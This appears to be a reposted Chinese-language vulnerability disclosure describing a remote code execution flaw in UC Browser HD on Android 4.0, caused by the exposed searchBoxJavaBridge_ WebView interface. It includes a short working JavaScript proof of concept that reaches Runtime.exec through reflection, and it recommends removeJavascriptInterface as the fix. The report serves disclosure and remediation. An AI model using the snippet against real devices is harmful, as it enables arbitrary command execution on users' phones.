UC浏览器HD版本远程代码执行漏洞
浏览器来说这种问题还是需要修补的
导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在
function execute(cmdArgs)
{
return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
测试页面:http://drops.wooyun.org/webview.html
参见: /Article/201309/241271.html
漏洞证明:
1.jpg
修复方案:
需要把这个接口删除,调用removeJavascriptInterface方法
/Article/201404/296370.html
/Article/201404/296370.html
- 上一篇:除去文件中的重复数据
- 下一篇:关于kvm
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻